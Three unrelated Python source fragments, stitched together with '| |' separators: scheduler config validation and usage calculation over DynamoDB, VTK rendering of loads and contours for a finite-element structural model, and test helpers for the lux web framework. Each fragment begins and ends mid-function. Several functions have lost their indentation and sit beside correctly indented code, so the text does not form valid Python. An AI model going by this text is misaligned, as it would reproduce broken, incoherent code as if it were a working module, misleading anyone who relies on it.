        missing name, a schedule without periods, or unknown periods
    """
    valid_parameters = [configuration.TIMEZONE,
                        configuration.PERIODS,
                        configuration.NAME,
                        configuration.DESCRIPTION,
                        configuration.OVERWRITE,
                        configuration.METRICS,
                        configuration.STOP_NEW_INSTANCES,
                        configuration.USE_MAINTENANCE_WINDOW,
                        configuration.SSM_MAINTENANCE_WINDOW,
                        configuration.RETAINED_RUNNING,
                        configuration.ENFORCED,
                        configuration.HIBERNATE,
                        configuration.OVERRIDE_STATUS,
                        configuration.SCHEDULE_CONFIG_STACK]
    # attributes that must hold boolean values
    flag_parameters = (configuration.METRICS,
                       configuration.STOP_NEW_INSTANCES,
                       configuration.USE_MAINTENANCE_WINDOW,
                       configuration.RETAINED_RUNNING,
                       configuration.HIBERNATE,
                       configuration.ENFORCED)
    result = {}
    for attr in schedule:
        # indicates the type of the config entry, not user data
        if attr == ConfigAdmin.TYPE_ATTR:
            continue
        if attr not in valid_parameters:
            raise ValueError(ERR_SCHEDULE_UNKNOWN_PARAMETER.format(attr, valid_parameters))
        # skip None/empty values
        if schedule[attr] is None or len(str(schedule[attr])) == 0:
            continue
        # the set of periods this schedule is built from
        if attr == configuration.PERIODS:
            period_set = self._ensure_set(schedule[attr])
            if len(period_set) > 0:
                result[attr] = period_set
            continue
        if attr in (configuration.NAME, configuration.SSM_MAINTENANCE_WINDOW):
            result[attr] = schedule[attr]
            continue
        # boolean flags
        if attr in flag_parameters:
            flag = self._ensure_bool(schedule[attr])
            if flag is None:
                raise ValueError(ERR_SCHEDULE_INVALID_BOOLEAN.format(schedule[attr], attr))
            result[attr] = flag
            continue
        # deprecated overwrite flag, mapped onto the override status
        if attr == configuration.OVERWRITE:
            if configuration.OVERRIDE_STATUS in schedule:
                raise ValueError(ERR_SCHEDULE_OVERWRITE_OVERRIDE_EXCLUSIVE.format(
                    configuration.OVERWRITE, configuration.OVERRIDE_STATUS))
            flag = self._ensure_bool(schedule[attr])
            if flag is None:
                raise ValueError(ERR_SCHEDULE_INVALID_BOOLEAN.format(schedule[attr], attr))
            result[configuration.OVERRIDE_STATUS] = \
                configuration.OVERRIDE_STATUS_RUNNING if flag \
                else configuration.OVERRIDE_STATUS_STOPPED
            continue
        if attr == configuration.OVERRIDE_STATUS:
            if configuration.OVERWRITE in schedule:
                raise ValueError(ERR_SCHEDULE_OVERWRITE_OVERRIDE_EXCLUSIVE.format(
                    configuration.OVERWRITE, configuration.OVERRIDE_STATUS))
            if schedule[attr] not in configuration.OVERRIDE_STATUS_VALUES:
                raise ValueError(ERR_SCHEDULE_INVALID_OVERRIDE.format(
                    schedule[attr], attr, ",".join(configuration.OVERRIDE_STATUS_VALUES)))
            result[attr] = schedule[attr]
            continue
        if attr in (configuration.DESCRIPTION, configuration.SCHEDULE_CONFIG_STACK):
            result[attr] = schedule[attr]
            continue
        if attr == configuration.TIMEZONE:
            timezone = schedule[configuration.TIMEZONE]
            if not SchedulerConfigBuilder.is_valid_timezone(timezone):
                raise ValueError(
                    ERR_SCHEDULE_INVALID_TIMEZONE.format(timezone, configuration.TIMEZONE))
            result[attr] = timezone
    # name is mandatory
    if configuration.NAME not in result:
        raise ValueError(ERR_SCHEDULE_NAME_MISSING)
    # without an override status there must be at least one period
    if configuration.OVERRIDE_STATUS not in schedule:
        if configuration.PERIODS not in schedule or len(schedule[configuration.PERIODS]) == 0:
            raise ValueError(ERR_SCHEDULE_NO_PERIOD)
    # every referenced period must exist in the configuration
    if configuration.PERIODS in result:
        known_periods = [p[configuration.NAME] for p in self._list_periods()]
        for period in result[configuration.PERIODS]:
            # strip an optional "<period><sep><instancetype>" suffix
            if period.split(configuration.INSTANCE_TYPE_SEP)[0] not in known_periods:
                raise ValueError(ERR_SCHEDULE_PERIOD_DOES_NOT_EXISTS.format(period))
    # indicates this item is a schedule
    result[ConfigAdmin.TYPE_ATTR] = "schedule"
    return result
def _items_of_type(self, config_type):
    """Read all items of one config type from the table, following
    DynamoDB scan pagination until no LastEvaluatedKey is returned."""
    items = []
    scan_args = {
        "FilterExpression": Key("type").eq(config_type),
        "ConsistentRead": True
    }
    while True:
        resp = self._table.scan_with_retries(**scan_args)
        items.extend(resp.get("Items", []))
        if "LastEvaluatedKey" not in resp:
            break
        # continue the scan from where the previous page stopped
        scan_args["ExclusiveStartKey"] = resp["LastEvaluatedKey"]
    return items
def _list_schedules(self):
    """Return all schedule items stored in the configuration table."""
    return self._items_of_type("schedule")
def _list_periods(self):
    """Return all period items stored in the configuration table."""
    return self._items_of_type("period")
def _get_schedule(self, schedule_name):
    """Fetch a single schedule item by name; None if it does not exist."""
    resp = self._table.get_item_with_retries(
        Key={"name": schedule_name, "type": "schedule"}, ConsistentRead=True)
    return resp.get("Item")
def _get_period(self, period_name):
    """Fetch a single period item by name; None if it does not exist."""
    resp = self._table.get_item_with_retries(
        Key={"name": period_name, "type": "period"}, ConsistentRead=True)
    return resp.get("Item")
def calculate_schedule_usage_for_period(self, schedule_name, start_dt, stop_dt=None, logger=None):
result = {}
def running_seconds(startdt, stopdt):
return max(int((stopdt - startdt).total_seconds()), 60)
def running_hours(startdt, stopdt):
return int(((stopdt - startdt).total_seconds() - 1) / 3600) + 1
def make_period(started_dt, stopped_dt):
running_period = ({
"begin": started_dt,
"end": stopped_dt,
"billing_hours": running_hours(started_dt, stopped_dt),
"billing_seconds": running_seconds(started_dt, stopped_dt)
})
return running_period
self._logger = logger
stop = stop_dt or start_dt
if start_dt > stop:
raise ValueError(ERR_STOP_MUST_BE_LATER_OR_EQUAL_TO_START)
dt = start_dt if isinstance(start_dt, datetime) else datetime(start_dt.year, start_dt.month, start_dt.day)
config_data = ConfigDynamodbAdapter(self._table.name).config
while dt <= stop:
self._configuration = SchedulerConfigBuilder(logger=self._logger).build(config_data)
conf = configuration.SchedulerConfigBuilder(self._logger).build(config=config_data, dt=dt)
schedule = conf.get_schedule(schedule_name)
timeline = {dt.replace(hour=0, minute=0)}
for p in schedule.periods:
begintime = p["period"].begintime
endtime = p["period"].endtime
if begintime is None and endtime is None:
timeline.add(dt.replace(hour=0, minute=0))
timeline.add(dt.replace(hour=23, minute=59))
else:
if begintime:
timeline.add(dt.replace(hour=begintime.hour, minute=begintime.minute))
if endtime:
timeline.add(dt.replace(hour=endtime.hour, minute=endtime.minute))
running_periods = {}
started = None
starting_period = None
current_state = None
inst = as_namedtuple("Instance", {"instance_str": "instance", "allow_resize": False})
for tm in sorted(list(timeline)):
desired_state, instance_type, period = schedule.get_desired_state(inst, self._logger, tm, False)
if current_state != desired_state:
if desired_state == InstanceSchedule.STATE_RUNNING:
started = tm
current_state = InstanceSchedule.STATE_RUNNING
starting_period = period
elif desired_state == InstanceSchedule.STATE_STOPPED:
stopped = tm
desired_state_with_adj_check, _, __ = schedule.get_desired_state(inst, self._logger, tm, True)
if desired_state_with_adj_check == InstanceSchedule.STATE_RUNNING:
stopped += timedelta(minutes=1)
if current_state == InstanceSchedule.STATE_RUNNING:
current_state = InstanceSchedule.STATE_STOPPED
running_periods[starting_period] = (make_period(started, stopped))
if current_state == InstanceSchedule.STATE_RUNNING:
stopped = dt.replace(hour=23, minute=59) + timedelta(minutes=1)
running_periods[starting_period] = (make_period(started, stopped))
result[str(dt.date())] = {
"running_periods": running_periods,
"billing_seconds": sum([running_periods[ps]["billing_seconds"] for ps in running_periods]),
"billing_hours": sum([running_periods[ph]["billing_hours"] for ph in running_periods])
}
dt += timedelta(days=1)
| |
[1, 0, 0], load_value/max_pt_load*5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'FY':
ptLoad = VisPtLoad(position, [0, 1, 0], load_value/max_pt_load*5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'FZ':
ptLoad = VisPtLoad(position, [0, 0, 1], load_value/max_pt_load*5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'MX':
ptLoad = VisMoment(position, [1*sign, 0, 0], abs(load_value)/max_moment*2.5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'MY':
ptLoad = VisMoment(position, [0, 1*sign, 0], abs(load_value)/max_moment*2.5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'MZ':
ptLoad = VisMoment(position, [0, 0, 1*sign], abs(load_value)/max_moment*2.5*text_height, '{:.3g}'.format(load_value), text_height)
polydata.AddInputData(ptLoad.polydata.GetOutput())
renderer.AddActor(ptLoad.lblActor)
ptLoad.lblActor.SetCamera(renderer.GetActiveCamera())
# Step through each member distributed load
for load in member.DistLoads:
# Determine if this load is part of the requested load combination
if load[5] in load_factors:
# Calculate the factored value for this load and it's sign (positive or negative)
w1 = load[1]*load_factors[load[5]]
w2 = load[2]*load_factors[load[5]]
sign1 = w1/abs(w1)
sign2 = w2/abs(w2)
# Calculate the loads location in 3D space
x1 = load[3]
x2 = load[4]
position1 = [x_start + dir_cos[0, 0]*x1, y_start + dir_cos[0, 1]*x1, z_start + dir_cos[0, 2]*x1]
position2 = [x_start + dir_cos[0, 0]*x2, y_start + dir_cos[0, 1]*x2, z_start + dir_cos[0, 2]*x2]
# Display the load
if load[0] == 'Fx':
distLoad = VisDistLoad(position1, position2, dir_cos[0, :], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'Fy':
distLoad = VisDistLoad(position1, position2, dir_cos[1, :], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'Fz':
distLoad = VisDistLoad(position1, position2, dir_cos[2, :], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'FX':
distLoad = VisDistLoad(position1, position2, [1, 0, 0], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'FY':
distLoad = VisDistLoad(position1, position2, [0, 1, 0], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'FZ':
distLoad = VisDistLoad(position1, position2, [0, 0, 1], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
polydata.AddInputData(distLoad.polydata.GetOutput())
renderer.AddActor(distLoad.lblActors[0])
renderer.AddActor(distLoad.lblActors[1])
distLoad.lblActors[0].SetCamera(renderer.GetActiveCamera())
distLoad.lblActors[1].SetCamera(renderer.GetActiveCamera())
# Step through each plate
i = 0
for plate in list(model.Plates.values()) + list(model.Quads.values()):
# Get the direction cosines for the plate's local z-axis
dir_cos = plate.T()[0:3, 0:3]
dir_cos = dir_cos[2]
# Step through each plate load
for load in plate.pressures:
# Determine if this load is part of the requested load combination
if load[1] in load_factors:
# Calculate the factored value for this load
load_value = load[0]*load_factors[load[1]]
# Find the sign for this load. Intercept any divide by zero errors
if load[0] == 0:
sign = 1
else:
sign = abs(load[0])/load[0]
# Find the position of the load's 4 corners
position0 = [plate.i_node.X, plate.i_node.Y, plate.i_node.Z]
position1 = [plate.j_node.X, plate.j_node.Y, plate.j_node.Z]
position2 = [plate.m_node.X, plate.m_node.Y, plate.m_node.Z]
position3 = [plate.n_node.X, plate.n_node.Y, plate.n_node.Z]
# Create an area load and get its data
area_load = VisAreaLoad(position0, position1, position2, position3, dir_cos*sign, abs(load_value)/max_area_load*5*text_height, '{:.3g}'.format(load_value), text_height)
# Add the area load's arrows to the overall load polydata
polydata.AddInputData(area_load.polydata.GetOutput())
# Add the 4 points at the corners of this area load to the list of points
polygon_points.InsertNextPoint(area_load.p0[0], area_load.p0[1], area_load.p0[2])
polygon_points.InsertNextPoint(area_load.p1[0], area_load.p1[1], area_load.p1[2])
polygon_points.InsertNextPoint(area_load.p2[0], area_load.p2[1], area_load.p2[2])
polygon_points.InsertNextPoint(area_load.p3[0], area_load.p3[1], area_load.p3[2])
# Create a polygon based on the four points we just defined.
# The 1st number in `SetId()` is the local point id
# The 2nd number in `SetId()` is the global point id
polygon = vtk.vtkPolygon()
polygon.GetPointIds().SetNumberOfIds(4)
polygon.GetPointIds().SetId(0, i*4)
polygon.GetPointIds().SetId(1, i*4 + 1)
polygon.GetPointIds().SetId(2, i*4 + 2)
polygon.GetPointIds().SetId(3, i*4 + 3)
# Add the polygon to the list of polygons
polygons.InsertNextCell(polygon)
# Add the load label
renderer.AddActor(area_load.label_actor)
# Set the text to follow the camera as the user interacts
area_load.label_actor.SetCamera(renderer.GetActiveCamera())
# `i` keeps track of the next polygon's ID. We've just added a polygon, so `i` needs to
# go up 1.
i += 1
# Create polygon polydata from all the points and polygons we just defined
polygon_polydata.SetPoints(polygon_points)
polygon_polydata.SetPolys(polygons)
# Set up an actor and mapper for the loads
load_mapper = vtk.vtkPolyDataMapper()
load_mapper.SetInputConnection(polydata.GetOutputPort())
load_actor = vtk.vtkActor()
load_actor.GetProperty().SetColor(0, 255, 0) # Green
load_actor.SetMapper(load_mapper)
renderer.AddActor(load_actor)
# Set up an actor and a mapper for the area load polygons
polygon_mapper = vtk.vtkPolyDataMapper()
polygon_mapper.SetInputData(polygon_polydata)
polygon_actor = vtk.vtkActor()
polygon_actor.GetProperty().SetColor(0, 255, 0) # Green
# polygon_actor.GetProperty().SetOpacity(0.5) # 50% opacity
polygon_actor.SetMapper(polygon_mapper)
renderer.AddActor(polygon_actor)
def _RenderContours(model, renderer, deformed_shape, deformed_scale, color_map, scalar_bar, combo_name):
    """Render the model's plates and quads, optionally colored by smoothed
    contour results.

    Fixes: non-idiomatic ``== True`` / ``!= None`` comparisons replaced with
    truthiness / ``is not None``; the scalar-bar block is nested inside the
    color-map branch so ``lut`` is always defined when it is used.

    :param model: finite element model holding ``Plates`` and ``Quads``
    :param renderer: vtkRenderer the actors are added to
    :param deformed_shape: render the deformed geometry when truthy
    :param deformed_scale: scale factor applied to nodal displacements
    :param color_map: contour quantity to plot; None renders geometry only
    :param scalar_bar: add a scalar bar legend when truthy
    :param combo_name: name of the load combination to display
    """
    # Cell array for the elements and a point container for their corners
    plates = vtk.vtkCellArray()
    plate_points = vtk.vtkPoints()
    # `results` mirrors the vtkDoubleArray as a plain Python list so the
    # lookup table range can be taken with min()/max()
    results = []
    plate_results = vtk.vtkDoubleArray()
    plate_results.SetNumberOfComponents(1)
    # Each element gets a unique id `i`, starting at 0
    i = 0
    # Calculate the smoothed contour results at each node
    _PrepContour(model, color_map, combo_name)
    for item in list(model.Plates.values()) + list(model.Quads.values()):
        # Corner points must be supplied in counter-clockwise order
        if deformed_shape:
            p0 = [item.i_node.X + item.i_node.DX[combo_name]*deformed_scale,
                  item.i_node.Y + item.i_node.DY[combo_name]*deformed_scale,
                  item.i_node.Z + item.i_node.DZ[combo_name]*deformed_scale]
            p1 = [item.j_node.X + item.j_node.DX[combo_name]*deformed_scale,
                  item.j_node.Y + item.j_node.DY[combo_name]*deformed_scale,
                  item.j_node.Z + item.j_node.DZ[combo_name]*deformed_scale]
            p2 = [item.m_node.X + item.m_node.DX[combo_name]*deformed_scale,
                  item.m_node.Y + item.m_node.DY[combo_name]*deformed_scale,
                  item.m_node.Z + item.m_node.DZ[combo_name]*deformed_scale]
            p3 = [item.n_node.X + item.n_node.DX[combo_name]*deformed_scale,
                  item.n_node.Y + item.n_node.DY[combo_name]*deformed_scale,
                  item.n_node.Z + item.n_node.DZ[combo_name]*deformed_scale]
        else:
            p0 = [item.i_node.X, item.i_node.Y, item.i_node.Z]
            p1 = [item.j_node.X, item.j_node.Y, item.j_node.Z]
            p2 = [item.m_node.X, item.m_node.Y, item.m_node.Z]
            p3 = [item.n_node.X, item.n_node.Y, item.n_node.Z]
        for corner in (p0, p1, p2, p3):
            plate_points.InsertNextPoint(corner)
        # Create a `vtkQuad` from the four points we just defined.
        # SetId maps local point ids (0-3) to global point ids.
        quad = vtk.vtkQuad()
        quad.GetPointIds().SetId(0, i*4)
        quad.GetPointIds().SetId(1, i*4 + 1)
        quad.GetPointIds().SetId(2, i*4 + 2)
        quad.GetPointIds().SetId(3, i*4 + 3)
        # Contour value previously smoothed onto each node
        r0 = item.i_node.contour
        r1 = item.j_node.contour
        r2 = item.m_node.contour
        r3 = item.n_node.contour
        if color_map is not None:
            # Keep the Python list and the VTK array in lockstep
            for value in (r0, r1, r2, r3):
                results.append(value)
                plate_results.InsertNextTuple([value])
        plates.InsertNextCell(quad)
        i += 1
    # Assemble the polydata from the points and quads
    plate_polydata = vtk.vtkPolyData()
    plate_polydata.SetPoints(plate_points)
    plate_polydata.SetPolys(plates)
    # Mapper/actor for the plates
    plate_mapper = vtk.vtkPolyDataMapper()
    plate_mapper.SetInputData(plate_polydata)
    plate_actor = vtk.vtkActor()
    plate_actor.SetMapper(plate_mapper)
    # Map the results onto the plates
    if color_map is not None:
        # NOTE(review): assumes at least one plate/quad exists when a
        # color map is requested; min()/max() raise on empty results.
        plate_polydata.GetPointData().SetScalars(plate_results)
        lut = vtk.vtkLookupTable()
        lut.SetTableRange(min(results), max(results))
        lut.SetNumberOfColors(256)
        # A vtkColorTransferFunction can be used here to install a custom
        # color scheme into the lookup table if desired.
        plate_mapper.SetLookupTable(lut)
        plate_mapper.SetUseLookupTableScalarRange(True)
        plate_mapper.SetScalarModeToUsePointData()
        lut.Build()
        # VTK sizes the scalar-bar label text to the bar itself;
        # SetMaximumWidthInPixels is the only practical size control.
        if scalar_bar:
            scalar = vtk.vtkScalarBarActor()
            scalar.SetLookupTable(lut)
            scalar.SetMaximumWidthInPixels(100)
            renderer.AddActor(scalar)
    renderer.AddActor(plate_actor)
def _MaxLoads(model, combo_name=None, case=None):
max_pt_load = 0
max_moment = 0
max_dist_load = 0
max_area_load = 0
# Find the requested load combination or load case
if case == None:
# Step through each node
for node in model.Nodes.values():
# | |
"""Utilities for testing Lux applications"""
import os
import unittest
import string
import logging
import pickle
from asyncio import get_event_loop
from collections import OrderedDict
from unittest import mock
from io import StringIO
from pulsar.api import as_coroutine
from pulsar.utils.httpurl import remove_double_slash
from pulsar.utils.string import random_string
from pulsar.utils.websocket import frame_parser
from pulsar.apps.wsgi import WsgiResponse
from pulsar.utils.system import json as _json
from pulsar.apps.test import test_timeout, sequential, test_wsgi_request
from pulsar.apps.greenio import wait, run_in_greenlet
from lux.core import App, AppClient
from lux.core.commands.generate_secret_key import generate_secret
from lux.utils import context
from .token import app_token
logger = logging.getLogger('pulsar.test')
__all__ = ['TestCase',
'AppTestCase',
'WebApiTestCase',
'load_fixtures',
'randomname',
'green',
'sequential',
'test_timeout']
def randomname(prefix=None, len=8):
    """Generate a random lowercase name with a prefix (default ``luxtest-``).

    NOTE: the ``len`` parameter shadows the builtin but is kept as-is for
    interface compatibility with existing callers.
    """
    chosen_prefix = 'luxtest-' if prefix is None else prefix
    suffix = random_string(min_len=len, max_len=len,
                           characters=string.ascii_letters)
    return ('%s%s' % (chosen_prefix, suffix)).lower()
def wsgi_request_from_app(app, **kw):
    """Build a test WSGI request and run the app's ``on_request`` hook on it."""
    req = wait(test_wsgi_request(**kw))
    app.on_request(req)
    return req
def green(test_fun):
    """Decorator to run a test function in the lux application green pool
    if available, otherwise in the event loop executor.

    In both cases it returns a :class:`~asyncio.Future`. Do not use this
    decorator for functions that already return an awaitable.
    """
    @run_in_greenlet
    def _(test):
        # make the test's application the current context app, if any
        context.set_app(getattr(test, 'app', None))
        return test_fun(test)
    return _
def test_app(test, config_file=None, config_params=True, argv=None, **params):
    """Return a lux application configured for testing. Override if needed.

    :param test: the test case the app is built for
    :param config_file: dotted path of the config module; defaults to
        ``test.config_file``
    :param config_params: merge ``test.config_params`` into ``params``
    :param argv: command line arguments for the application
    """
    kwargs = dict(test.config_params, **params) if config_params else params
    config_file = config_file or test.config_file
    argv = [] if argv is None else argv
    if '--log-level' not in argv:
        argv.append('--log-level')
        levels = test.cfg.log_level if hasattr(test, 'cfg') else ['none']
        argv.extend(levels)
    # NOTE(review): ``cfg=test.cfg`` is passed unconditionally although
    # ``test.cfg`` is guarded with hasattr above -- confirm callers always
    # provide it.
    app = App(config_file, argv=argv, cfg=test.cfg, **kwargs).setup()
    # never run tests with the placeholder secret key
    if app.config['SECRET_KEY'] == 'secret-key':
        app.config['SECRET_KEY'] = generate_secret()
    app.stdout = StringIO()
    app.stderr = StringIO()
    assert app.request_handler()
    return app
@green
def create_users(app, items, testuser, index=None):
    """Create the users in ``items``; for the first fixture file also
    prepend the superuser test account.

    :param app: lux application
    :param items: list of user parameter dicts
    :param testuser: username of the superuser test account
    :param index: fixture-file index; the superuser is only added when falsy
    :return: number of users actually created
    """
    if not index:
        # NOTE(review): the password literal was redacted in the source
        # (``<PASSWORD>`` placeholder, a syntax error). Using the username
        # as password matches the authorization calls in load_fixtures --
        # confirm against the original fixtures.
        items.insert(0, {
            "username": testuser,
            "password": testuser,
            "superuser": True,
            "active": True
        })
    logger.debug('Creating %d users', len(items))
    request = wsgi_request_from_app(app)
    processed = set()
    with app.models['users'].session(request) as session:
        for params in items:
            # skip duplicate usernames within the same fixture set
            if params.get('username') in processed:
                continue
            user = session.auth.create_user(session, **params)
            if user:
                processed.add(user.username)
    return len(processed)
async def load_fixtures(app, path=None, api_url=None, testuser=None,
                        admin_jwt=None):
    """Load fixtures from the application's fixtures directory.

    This function requires an authentication backend supporting user
    creation.

    :param app: lux application
    :param path: fixtures directory; defaults to ``<app path>/fixtures``
    :param api_url: base URL prefix for API calls
    :param testuser: default username used for API calls
    :param admin_jwt: JWT used when authorizing fixture users
    """
    testuser = testuser or 'testuser'
    fpath = path if path else os.path.join(app.meta.path, 'fixtures')
    total = 0
    if not os.path.isdir(fpath):
        # only report an error when an explicit path was requested
        if path:
            logger.error('Could not find %s path for fixtures', path)
        return total
    api_url = api_url or ''
    if api_url.endswith('/'):
        api_url = api_url[:-1]
    client = AppClient.create(app, False)
    test = TestCase()
    test_tokens = {}
    for index, fixtures in enumerate(_read_fixtures(fpath)):
        total += await create_users(
            app, fixtures.pop('users', []), testuser, index
        )
        for name, items in fixtures.items():
            logger.info('%d fixtures for "%s"', len(items), name)
            for params in items:
                user = params.pop('api_user', testuser)
                if user not in test_tokens:
                    # NOTE(review): the password literal was redacted in
                    # the source (``<PASSWORD>``, a syntax error);
                    # assuming password == username as set up by
                    # create_users -- confirm.
                    response = await client.post(
                        '%s/authorizations' % api_url,
                        json=dict(username=user, password=user),
                        jwt=admin_jwt
                    )
                    token = test.json(response, 201)['id']
                    test_tokens[user] = token
                test_token = test_tokens[user]
                url = '%s%s' % (api_url, params.pop('api_url', '/%s' % name))
                method = params.pop('api_method', 'post')
                #
                # Allow to patch an existing model by its primary key
                if method == 'patch' and name in app.models:
                    url = '%s/%s' % (
                        url, params.pop(app.models[name].id_field)
                    )
                response = await client.request(method, url, json=params,
                                                token=test_token)
                data = test.json(response)
                code = response.status_code
                if code > 201:
                    raise AssertionError('%s api call got %d: %s' %
                                         (url, code, data))
                total += 1
    logger.info('Created %s objects', total)
class TestMixin:
app = None
"""Test class application"""
config_file = 'tests.config'
"""The config file to use when building an :meth:`application`"""
config_params = {}
"""Dictionary of parameters to override parameters from
:attr:`config_file`
"""
prefixdb = 'testlux_'
def authenticity_token(self, doc):
    """Extract the CSRF parameter name/token pair from a parsed page.

    Returns a single-entry dict ``{param_name: token}`` or None when the
    two CSRF meta tags are not both present.
    """
    param_meta = doc.find('meta', attrs={'name': 'csrf-param'})
    token_meta = doc.find('meta', attrs={'name': 'csrf-token'})
    if param_meta and token_meta:
        return {param_meta.attrs['content']: token_meta.attrs['content']}
def cookie(self, response):
    """Return the Set-Cookie header of ``response``, or None if absent."""
    return dict(response.get_headers()).get('Set-Cookie')
def bs(self, response, status_code=None, mode=None):
    """Return a BeautifulSoup document built from the HTML response body."""
    from bs4 import BeautifulSoup
    body = self.html(response, status_code)
    return BeautifulSoup(body, 'html.parser')
def html(self, response, status_code=None):
    """Check that ``response`` is an HTML response and return its body text.

    When ``status_code`` is given the response status is asserted as well.
    """
    if status_code:
        self.assertEqual(response.status_code, status_code)
    content_type = response.headers['Content-Type']
    self.assertEqual(content_type, 'text/html; charset=utf-8')
    return response.text
def text(self, response, status_code=None):
    """Check that ``response`` is a plain-text response and return its body.

    When ``status_code`` is given the response status is asserted as well.
    """
    if status_code:
        self.assertEqual(response.status_code, status_code)
    content_type = response.headers['Content-Type']
    self.assertEqual(content_type, 'text/plain; charset=utf-8')
    return response.text
def json(self, response, status_code=None):
    """Check that ``response`` is a JSON response and return the decoded body.

    When ``status_code`` is given the response status is asserted as well.
    """
    if status_code:
        self.assertEqual(response.status_code, status_code)
    content_type = response.headers['Content-Type']
    self.assertEqual(content_type, 'application/json; charset=utf-8')
    return response.json()
def xml(self, response, status_code=None):
    """Check that ``response`` is an XML response and return the parsed tree.

    When ``status_code`` is given the response status is asserted as well.
    """
    from bs4 import BeautifulSoup
    if status_code:
        self.assertEqual(response.status_code, status_code)
    content_type = response.headers['Content-Type']
    self.assertEqual(content_type, 'application/xml; charset=utf-8')
    return BeautifulSoup(response.text, 'xml')
def empty(self, response, status_code=None):
    """Check that ``response`` has no body content.

    When ``status_code`` is given the response status is asserted as well.
    """
    if status_code:
        self.assertEqual(response.status_code, status_code)
    self.assertFalse(response.content)
def ws_upgrade(self, response):
    """Turn a 101 upgrade ``response`` into a mocked websocket and
    return it.

    Assumes the test transport recorded the upgrade call on the mocked
    connection; the websocket protocol is built from the factory that
    was passed to ``connection.upgrade``.
    """
    from lux.ext.sockjs import LuxWs
    self.assertEqual(response.status_code, 101)
    #
    connection = response.connection
    upgrade = connection.upgrade
    self.assertTrue(upgrade.called)
    # upgrade.call_args[0][0] is the protocol factory; call it with the
    # event loop to obtain the websocket protocol instance.
    websocket = upgrade.call_args[0][0](get_event_loop())
    connection.reset_mock()
    #
    self.assertIsInstance(websocket.handler, LuxWs)
    # Re-bind the websocket to the mocked connection as if the upgrade
    # had really happened.
    websocket._connection = response.connection
    websocket.connection_made(response.connection)
    self.assertTrue(websocket.cache.wsclient)
    # Silence the client logger during tests.
    websocket.cache.wsclient.logger = mock.MagicMock()
    return websocket
def ws_message(self, **params):
    """Encode ``params`` as a sockjs-style frame: a JSON array holding
    one JSON-encoded message string.
    """
    payload = _json.dumps(params)
    return _json.dumps([payload])
def get_ws_message(self, websocket):
    """Pop the last frame written to ``websocket`` and decode it.

    Fails when nothing was written to the mocked connection.
    """
    write_mock = websocket.connection.write
    self.assertTrue(write_mock.called)
    raw_frame = write_mock.call_args[0][0]
    return self.parse_frame(websocket, raw_frame)
def parse_frame(self, websocket, frame):
    """Decode a raw websocket ``frame`` into the wire-protocol message.

    Resets the mocked connection so subsequent writes can be asserted
    independently.
    """
    parser = frame_parser(kind=1)
    frame = parser.decode(frame)
    wsclient = websocket.cache.wsclient
    websocket.connection.reset_mock()
    # The body is '<type-byte>[json-array]'; skip the type byte and take
    # the first array element as the message payload.
    msg = _json.loads(frame.body[1:])[0]
    return wsclient.protocol.decode(msg)
def assertValidationError(self, response, field=None, text=None):
    """Assert a Form validation error.

    ``response`` may be a raw ``WsgiResponse`` (asserted to be a 422
    with a JSON body) or an already-decoded data dictionary. When
    ``field`` is given, that field must carry an error message; when
    ``text`` is given, the message must match it exactly. Form-wide
    errors are addressed with an empty ``field``.
    """
    if isinstance(response, WsgiResponse):
        self.assertEqual(response.status_code, 422)
        data = self.json(response)
    else:
        data = response
    self.assertTrue(data['error'])
    errors = {d['field']: d['message'] for d in data.get('errors', ())}
    # the form-wide message is addressed with the empty key
    errors[''] = data.get('message')
    msg = errors.get(field or '')
    if field is not None:
        self.assertTrue(msg)
    if text:
        self.assertEqual(msg, text)
def check401(self, response):
    """Assert an unauthorised JSON response with a Token challenge."""
    self.json(response, 401)
    self.assertEqual(response.headers['WWW-Authenticate'], 'Token')
def checkOptions(self, response, methods=None):
    """Check a CORS preflight (OPTIONS) response.

    When ``methods`` is given, the allowed methods advertised by the
    response must match it exactly (order-insensitive).
    """
    self.assertEqual(response.status_code, 200)
    self.assertTrue('Access-Control-Allow-Origin' in response.headers)
    allow_header = response.headers['Access-Control-Allow-Methods']
    advertised = set(allow_header.split(', '))
    if methods:
        self.assertEqual(set(methods), advertised)
def check_og_meta(self, bs, type=None, image=None):
    """Verify open-graph meta tags in a parsed document ``bs``.

    ``og:type`` defaults to ``'website'``; ``og:image`` is only
    checked when ``image`` is given.
    """
    og_type = bs.find('meta', property='og:type')
    self.assertEqual(og_type['content'], type or 'website')
    #
    if image:
        og_image = bs.find('meta', property='og:image')
        self.assertEqual(og_image['content'], image)
class TestCase(unittest.TestCase, TestMixin):
    """TestCase class for lux tests.

    It provides several utilities methods.
    """
    # Lazily-created list of applications built by this test case.
    apps = None

    def application(self, **params):
        """Return an application for testing. Override if needed."""
        app = test_app(self, **params)
        if self.apps is None:
            self.apps = [app]
        else:
            self.apps.append(app)
        return app

    @classmethod
    def app_client(cls, app):
        """Return a client bound to ``app``."""
        return AppClient.create(app, False)
class AppTestCase(unittest.TestCase, TestMixin):
    """Test class for testing a single application

    Builds one lux application per test class, swaps the configured
    datastores for throw-away test databases, loads fixtures, and drops
    the databases again on teardown.

    NOTE(review): the class-level hooks are coroutines -- this assumes
    an async-aware test runner that awaits ``setUpClass`` and
    ``tearDownClass``; the stock ``unittest`` runner would not.
    """
    fixtures_path = None
    """path to fixtures"""
    odm = None
    """Original odm handler"""
    datastore = None
    """Test class datastore dictionary"""
    # Plain TestCase instance used to borrow assertion helpers inside
    # classmethods (see user_token).
    _test = TestCase()

    @classmethod
    async def setUpClass(cls):
        # Create the application
        cls.dbs = {}
